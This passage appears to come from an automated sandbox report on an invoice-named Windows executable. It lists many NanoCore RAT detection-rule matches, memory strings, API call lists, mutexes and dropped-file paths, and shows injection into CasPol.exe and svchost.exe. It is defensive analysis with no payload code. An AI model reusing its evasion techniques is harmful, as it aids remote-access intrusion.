        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCngH Tzy.exe2 vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.949930173.0000000004EF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287994.exe
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: svchost.exe PID: 4184, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@50/24@7/4
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 3_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 4_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 3_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 3_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210225
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{883c2226-d991-4f34-8646-4dd2732a341c}
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2016
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: unknown | Process created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
